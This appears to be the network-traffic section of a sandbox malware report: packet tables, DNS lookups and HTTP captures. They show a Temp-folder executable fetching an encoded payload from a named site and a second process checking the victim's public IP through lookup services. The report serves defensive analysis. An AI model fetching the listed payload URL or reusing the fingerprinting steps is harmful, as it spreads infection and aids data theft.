Jan 3, 2025 20:39:59.928457975 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928541899 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.928754091 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928786993 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928822041 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.928832054 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.928862095 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.929050922 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.929074049 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.929088116 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.929091930 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:39:59.929116011 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:39:59.929287910 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018215895 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018233061 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018320084 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018320084 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018327951 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018435955 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018524885 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018542051 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018609047 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018614054 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018661976 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018788099 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018804073 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018878937 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018878937 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.018882990 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.018954039 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019066095 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019085884 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019157887 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019157887 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019162893 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019330978 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019364119 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019377947 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019529104 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019534111 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019634008 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019790888 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019805908 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019927025 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.019932032 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.019990921 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.020052910 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.020067930 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.020131111 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.020137072 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.020226955 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.020447969 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.020462990 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.020539045 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.020539045 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.020545006 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.020643950 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.137993097 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138009071 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138318062 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138361931 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.138375998 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138401985 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138426065 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.138776064 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138789892 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.138811111 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.138895035 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.138895035 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.138900995 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139051914 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139069080 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139166117 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.139166117 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.139172077 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139327049 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139341116 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139692068 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.139700890 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139817953 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139836073 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.139909029 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.139909029 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.139914036 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140182018 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140198946 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140271902 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.140271902 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.140276909 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140455008 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140482903 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140517950 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.140522957 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.140558004 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.142448902 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.229448080 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.229460955 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.229552031 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.229558945 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.229609966 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.229917049 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.229933023 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.230041027 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.230046034 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.230304003 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.230751991 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.230766058 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.230905056 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.230911016 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231002092 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231004000 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231012106 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231051922 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231095076 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231173038 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231177092 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231333017 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231349945 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231364965 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231453896 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231453896 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231460094 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231618881 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231637001 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231652975 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231657028 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.231678963 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.231751919 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.232036114 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.232049942 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.232124090 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.232124090 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.232129097 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.232173920 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.232331991 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.232359886 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.232397079 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.232402086 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.232434034 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.232484102 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.349452972 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.349478960 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.349554062 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.349554062 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.349565029 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.349644899 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.349828959 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.349843025 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.349915981 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.349921942 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.350018978 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.350255966 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.350270033 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.350311995 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.350316048 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.350347996 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.350393057 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.353579998 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.353595018 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.353679895 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.353679895 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.353686094 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.353857994 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.353899956 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.353914022 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.353987932 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.353987932 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.353993893 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354146004 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.354208946 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354226112 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354370117 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.354383945 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354444027 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.354542017 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354562044 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354605913 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.354612112 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354758978 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.354778051 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354792118 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354854107 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.354859114 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.354901075 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.441052914 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.441087008 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.441163063 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.441163063 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.441169977 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.441195965 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.441225052 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.441231012 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.441265106 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.441323042 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.441421986 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.442115068 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.442115068 CET	49705	443	192.168.2.5	41.185.8.252
Jan 3, 2025 20:40:00.442133904 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:00.442142010 CET	443	49705	41.185.8.252	192.168.2.5
Jan 3, 2025 20:40:05.323126078 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:40:05.327924967 CET	80	49706	158.101.44.242	192.168.2.5
Jan 3, 2025 20:40:05.327994108 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:40:05.328372955 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:40:05.333133936 CET	80	49706	158.101.44.242	192.168.2.5
Jan 3, 2025 20:40:14.460736036 CET	80	49706	158.101.44.242	192.168.2.5
Jan 3, 2025 20:40:14.511964083 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:40:14.516839981 CET	80	49706	158.101.44.242	192.168.2.5
Jan 3, 2025 20:40:15.852946043 CET	80	49706	158.101.44.242	192.168.2.5
Jan 3, 2025 20:40:15.970438004 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:15.970474005 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:15.970592976 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:15.972517967 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:40:16.033756018 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:16.033773899 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.526864052 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.526937008 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:16.533046007 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:16.533055067 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.533379078 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.632256031 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:16.675342083 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.753262997 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.753340006 CET	443	49708	188.114.96.3	192.168.2.5
Jan 3, 2025 20:40:16.753393888 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:16.764595032 CET	49708	443	192.168.2.5	188.114.96.3
Jan 3, 2025 20:40:32.444370031 CET	52376	53	192.168.2.5	162.159.36.2
Jan 3, 2025 20:40:32.449171066 CET	53	52376	162.159.36.2	192.168.2.5
Jan 3, 2025 20:40:32.451649904 CET	52376	53	192.168.2.5	162.159.36.2
Jan 3, 2025 20:40:32.463469982 CET	53	52376	162.159.36.2	192.168.2.5
Jan 3, 2025 20:40:32.906387091 CET	52376	53	192.168.2.5	162.159.36.2
Jan 3, 2025 20:40:32.911843061 CET	53	52376	162.159.36.2	192.168.2.5
Jan 3, 2025 20:40:32.911894083 CET	52376	53	192.168.2.5	162.159.36.2
Jan 3, 2025 20:41:20.820555925 CET	80	49706	158.101.44.242	192.168.2.5
Jan 3, 2025 20:41:20.820617914 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:41:55.883332014 CET	49706	80	192.168.2.5	158.101.44.242
Jan 3, 2025 20:41:55.889401913 CET	80	49706	158.101.44.242	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 20:39:56.785871983 CET	62461	53	192.168.2.5	1.1.1.1
Jan 3, 2025 20:39:57.435594082 CET	53	62461	1.1.1.1	192.168.2.5
Jan 3, 2025 20:40:05.279599905 CET	55632	53	192.168.2.5	1.1.1.1
Jan 3, 2025 20:40:05.286645889 CET	53	55632	1.1.1.1	192.168.2.5
Jan 3, 2025 20:40:15.962210894 CET	64527	53	192.168.2.5	1.1.1.1
Jan 3, 2025 20:40:15.969821930 CET	53	64527	1.1.1.1	192.168.2.5
Jan 3, 2025 20:40:32.163083076 CET	53	63628	162.159.36.2	192.168.2.5
Jan 3, 2025 20:40:32.929462910 CET	65185	53	192.168.2.5	1.1.1.1
Jan 3, 2025 20:40:32.937082052 CET	53	65185	1.1.1.1	192.168.2.5
Jan 3, 2025 20:40:34.318243027 CET	56409	53	192.168.2.5	1.1.1.1
Jan 3, 2025 20:40:34.335623980 CET	53	56409	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 3, 2025 20:39:56.785871983 CET	192.168.2.5	1.1.1.1	0x8f6b	Standard query (0)	lwaziacademy.com	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:05.279599905 CET	192.168.2.5	1.1.1.1	0x3ebf	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:15.962210894 CET	192.168.2.5	1.1.1.1	0x8787	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:32.929462910 CET	192.168.2.5	1.1.1.1	0x3628	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 3, 2025 20:40:34.318243027 CET	192.168.2.5	1.1.1.1	0x525e	Standard query (0)	212.20.149.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 3, 2025 20:39:57.435594082 CET	1.1.1.1	192.168.2.5	0x8f6b	No error (0)	lwaziacademy.com		41.185.8.252	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:05.286645889 CET	1.1.1.1	192.168.2.5	0x3ebf	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 3, 2025 20:40:05.286645889 CET	1.1.1.1	192.168.2.5	0x3ebf	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:05.286645889 CET	1.1.1.1	192.168.2.5	0x3ebf	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:05.286645889 CET	1.1.1.1	192.168.2.5	0x3ebf	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:05.286645889 CET	1.1.1.1	192.168.2.5	0x3ebf	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:05.286645889 CET	1.1.1.1	192.168.2.5	0x3ebf	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:15.969821930 CET	1.1.1.1	192.168.2.5	0x8787	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:15.969821930 CET	1.1.1.1	192.168.2.5	0x8787	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 3, 2025 20:40:32.937082052 CET	1.1.1.1	192.168.2.5	0x3628	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 3, 2025 20:40:34.335623980 CET	1.1.1.1	192.168.2.5	0x525e	Name error (3)	212.20.149.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

lwaziacademy.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	158.101.44.242	80	6004	C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:40:05.328372955 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 3, 2025 20:40:14.460736036 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:40:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cc73770b3322fc4e720f575af988ab43 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 3, 2025 20:40:14.511964083 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 3, 2025 20:40:15.852946043 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:40:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 011b740a3fe3644eaca90c23c49dd578 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	41.185.8.252	443	2788	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 19:39:58 UTC	169	OUT	GET /wps/200_Oupzhkprnvw HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: lwaziacademy.com
2025-01-03 19:39:59 UTC	182	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 19:39:58 GMT Content-Length: 906612 Connection: close Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT Accept-Ranges: bytes
2025-01-03 19:39:59 UTC	15178	IN	Data Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32 Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
